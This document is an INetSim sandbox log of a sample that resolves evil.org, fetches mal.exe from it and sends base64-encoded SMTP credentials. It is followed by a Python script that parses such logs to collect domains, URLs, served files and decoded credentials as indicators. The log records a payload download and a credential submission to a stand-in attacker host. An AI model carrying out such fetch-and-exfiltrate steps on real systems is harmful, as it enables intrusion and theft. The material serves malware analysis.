[2007-10-07 14:24:41] [samplesession] [dns 53/udp/tcp] [172.16.1.5] connect
[2007-10-07 14:24:41] [samplesession] [dns 53/udp/tcp] [172.16.1.5] recv: Query Type A, Class IN, Name evil.org
[2007-10-07 14:24:41] [samplesession] [dns 53/udp/tcp] [172.16.1.5] send: evil.org 3600 IN A 172.16.1.1
[2007-10-07 14:24:41] [samplesession] [dns 53/udp/tcp] [172.16.1.5] disconnect
[2007-10-07 14:24:41] [samplesession] [dns 53/udp/tcp] [172.16.1.5] stat: 1 qtype=A qclass=IN qname=evil.org
[2007-10-07 14:24:41] [samplesession] [http 80/tcp] [172.16.1.5:1031] connect
[2007-10-07 14:24:44] [samplesession] [http 80/tcp] [172.16.1.5:1031] recv: GET /mal.exe HTTP/1.1
[2007-10-07 14:24:44] [samplesession] [http 80/tcp] [172.16.1.5:1031] recv: Accept: */*
[2007-10-07 14:24:44] [samplesession] [http 80/tcp] [172.16.1.5:1031] recv: UA-CPU: x86
[2007-10-07 14:24:44] [samplesession] [http 80/tcp] [172.16.1.5:1031] recv: Accept-Encoding: gzip, deflate
[2007-10-07 14:24:44] [samplesession] [http 80/tcp] [172.16.1.5:1031] recv: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
[2007-10-07 14:24:44] [samplesession] [http 80/tcp] [172.16.1.5:1031] recv: Host: evil.org
[2007-10-07 14:24:44] [samplesession] [http 80/tcp] [172.16.1.5:1031] recv: Connection: Keep-Alive
[2007-10-07 14:24:44] [samplesession] [http 80/tcp] [172.16.1.5:1031] info: Request URL: http://evil.org/mal.exe
[2007-10-07 14:24:44] [samplesession] [http 80/tcp] [172.16.1.5:1031] send: 200 OK
[2007-10-07 14:24:44] [samplesession] [http 80/tcp] [172.16.1.5:1031] send: Server: Microsoft-IIS/4.0
[2007-10-07 14:24:44] [samplesession] [http 80/tcp] [172.16.1.5:1031] send: Connection: Close
[2007-10-07 14:24:44] [samplesession] [http 80/tcp] [172.16.1.5:1031] send: Content-Length: 24576
[2007-10-07 14:24:44] [samplesession] [http 80/tcp] [172.16.1.5:1031] send: Content-Type: x-msdos-program
[2007-10-07 14:24:44] [samplesession] [http 80/tcp] [172.16.1.5:1031] send: Date: Thu, 11 Oct 2007 12:24:44 GMT
[2007-10-07 14:24:44] [samplesession] [http 80/tcp] [172.16.1.5:1031] info: Sending file: /opt/inetsim/data/http/fakefiles/sample_gui.exe
[2007-10-07 14:24:44] [samplesession] [http 80/tcp] [172.16.1.5:1031] stat: 1 method=GET url=http://evil.org/mal.exe file=/opt/inetsim/data/http/fakefiles/sample_gui.exe
[2007-10-07 14:24:44] [samplesession] [http 80/tcp] [172.16.1.5:1031] disconnect
[2007-10-07 14:26:00] [samplesession] [dns 53/udp/tcp] [172.16.1.5] connect
[2007-10-07 14:26:00] [samplesession] [dns 53/udp/tcp] [172.16.1.5] recv: Query Type A, Class IN, Name mail.evil.org
[2007-10-07 14:26:00] [samplesession] [dns 53/udp/tcp] [172.16.1.5] send: mail.evil.org 3600 IN A 172.16.1.1
[2007-10-07 14:26:00] [samplesession] [dns 53/udp/tcp] [172.16.1.5] disconnect
[2007-10-07 14:26:00] [samplesession] [dns 53/udp/tcp] [172.16.1.5] stat: 1 qtype=A qclass=IN qname=mail.evil.org
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] connect
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] send: 220 mail.inetsim.org INetSim SMTP Mailer ready.
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] recv: EHLO 172.16.1.5
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] send: 250-mail.inetsim.org
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] send: 250-ENHANCEDSTATUSCODES
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] send: 250-8BITMIME
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] send: 250-SIZE 10240000
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] send: 250-AUTH PLAIN LOGIN CRAM-MD5
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] send: 250 ETRN
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] recv: AUTH LOGIN
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] send: 334 VXNlcm5hbWU6
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] info: VXNlcm5hbWU6 => Username:
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] recv: aW5mbytldmlsLm9yZwo=
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] info: aW5mbytldmlsLm9yZwo= => info+evil.org
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] send: 334 UGFzc3dvcmQ6
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] info: UGFzc3dvcmQ6 => Password:
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] recv: MTIzNDU2
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] info: MTIzNDU2 => 123456
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] send: 235 Authentication successful
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] recv: MAIL FROM: info@evil.org
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] send: 250 Ok
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] recv: RCPT TO: info@evil.org
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] send: 250 Ok
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] recv: DATA
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] send: 354 End data with <CR><LF>.<CR><LF>
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] recv: <(MESSAGE)>
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] recv: .
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] send: 250 Ok: queued as 470E1658
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] stat: 1 mails=1 recips=1 auth=login creds=info+evil.org:123456
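The log above already carries a per-connection `stat:` summary for each service, and INetSim decodes the AUTH LOGIN base64 in its `info:` lines. When a sandbox run produces thousands of such lines, the useful output is the indicator list: domains the sample resolved, URLs it fetched, the fake file INetSim served in place of the payload, and any credentials it sent. The Python below is an added example, not part of INetSim, that walks log lines in the layout shown above (`[timestamp] [session] [service port/proto] [client] kind: message`) and collects exactly those indicators. It decodes the raw AUTH LOGIN tokens itself rather than trusting the `info:` lines, so the result can be cross-checked against the `creds=` field of the SMTP `stat:` line. The sample input is copied from the log above; the regex and field names are this example's own assumptions about the format.

```python
"""Pull indicators out of INetSim service-log lines (added example, not INetSim code).
Assumes the line layout seen above: '[ts] [session] [service port/proto] [client] kind: msg'."""
import base64
import binascii
import re

# Sample input: lines copied from the INetSim log above (only those the parser uses).
LOG = """\
[2007-10-07 14:24:41] [samplesession] [dns 53/udp/tcp] [172.16.1.5] stat: 1 qtype=A qclass=IN qname=evil.org
[2007-10-07 14:24:44] [samplesession] [http 80/tcp] [172.16.1.5:1031] stat: 1 method=GET url=http://evil.org/mal.exe file=/opt/inetsim/data/http/fakefiles/sample_gui.exe
[2007-10-07 14:26:00] [samplesession] [dns 53/udp/tcp] [172.16.1.5] stat: 1 qtype=A qclass=IN qname=mail.evil.org
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] recv: AUTH LOGIN
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] recv: aW5mbytldmlsLm9yZwo=
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] recv: MTIzNDU2
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] recv: MAIL FROM: info@evil.org
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] recv: RCPT TO: info@evil.org
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] stat: 1 mails=1 recips=1 auth=login creds=info+evil.org:123456
"""

# Service field is '<name> <port/proto>'; 'connect'/'disconnect' carry no message.
LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[(?P<session>[^\]]+)\] \[(?P<service>\S+) [^\]]*\] "
    r"\[(?P<client>[^\]]+)\] (?P<kind>connect|disconnect|recv|send|info|stat)"
    r"(?:: (?P<msg>.*))?$"
)


def parse_line(line):
    """Split one log line into its fields; None if the line is not INetSim-shaped."""
    m = LINE_RE.match(line.rstrip("\r\n"))
    return m.groupdict() if m else None


def parse_stat(msg):
    """'1 qtype=A qname=evil.org' -> {'qtype': 'A', 'qname': 'evil.org'}.
    Drops the leading counter; splits on the first '=' only, because values such as
    creds=user:pass and url=http://... contain ':' and '/' but never spaces."""
    return dict(tok.partition("=")[::2] for tok in msg.split()[1:])


def b64_text(token):
    """Decode one AUTH LOGIN token; None if it is not valid base64 (exchange aborted).
    Strips the trailing newline: the username above decodes to 'info+evil.org\\n'
    because the client base64-encoded its own line terminator."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", "replace").strip()


def _feed_auth(pending, client, tokens, out):
    """Consume base64 tokens of one client's in-progress AUTH LOGIN.
    Two decoded tokens form a (username, password) pair; garbage aborts the exchange."""
    for tok in tokens:
        text = b64_text(tok)
        if text is None:
            pending.pop(client, None)
            return
        pending[client].append(text)
        if len(pending[client]) == 2:
            out.append(tuple(pending.pop(client)))
            return


def extract_iocs(log_text):
    """Walk the log once and collect what the sample reached for."""
    iocs = {"domains": [], "urls": [], "served_files": [], "smtp_credentials": [],
            "auth_login_decoded": [], "mail_from": [], "rcpt_to": []}
    pending = {}  # client -> decoded AUTH LOGIN tokens seen so far
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        svc, kind, client = rec["service"], rec["kind"], rec["client"]
        msg = rec["msg"] or ""
        if kind == "stat":
            st = parse_stat(msg)
            if svc == "dns" and "qname" in st:
                iocs["domains"].append(st["qname"])
            elif svc == "http":
                if "url" in st:
                    iocs["urls"].append(st["url"])
                if "file" in st:
                    iocs["served_files"].append(st["file"])
            elif svc == "smtp" and "creds" in st:
                # INetSim's own decode of the credentials, kept for cross-checking
                iocs["smtp_credentials"].append(tuple(st["creds"].partition(":")[::2]))
        elif svc == "smtp" and kind == "recv":
            upper = msg.upper()
            if upper.startswith("MAIL FROM:"):
                iocs["mail_from"].append(msg.split(":", 1)[1].strip())
            elif upper.startswith("RCPT TO:"):
                iocs["rcpt_to"].append(msg.split(":", 1)[1].strip())
            elif upper.startswith("AUTH LOGIN"):
                pending[client] = []
                # some clients send the username inline: 'AUTH LOGIN <base64>'
                _feed_auth(pending, client, msg.split()[2:], iocs["auth_login_decoded"])
            elif client in pending:
                _feed_auth(pending, client, [msg], iocs["auth_login_decoded"])
    return iocs


if __name__ == "__main__":
    for key, vals in extract_iocs(LOG).items():
        print(f"{key:20} {vals}")
```

Run against the lines above, `auth_login_decoded` and `smtp_credentials` both come out as `[("info+evil.org", "123456")]`; a mismatch between the two would mean either the client sent something other than plain base64 or INetSim's `info:` decode should not be trusted for that session. The `validate=True` flag on `b64decode` matters: without it Python silently drops non-alphabet characters and a line such as `MAIL FROM:` sent mid-handshake could be mistaken for a credential.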